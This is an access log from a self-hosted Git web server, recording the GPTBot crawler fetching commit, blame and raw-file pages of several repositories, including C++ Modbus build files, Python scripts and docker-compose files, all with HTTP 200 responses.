git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10677] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11270] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21061] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21354] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21063] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11317] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11270] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:16:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11918] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" -[17/Feb/2026:16:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13024] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" -[17/Feb/2026:16:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" -[17/Feb/2026:16:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:16:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:16:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13016] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" -[17/Feb/2026:16:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11912] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" -[17/Feb/2026:16:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" -[17/Feb/2026:16:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12992] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13924] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10683] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10232] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:16:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10685] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13923] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13921] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 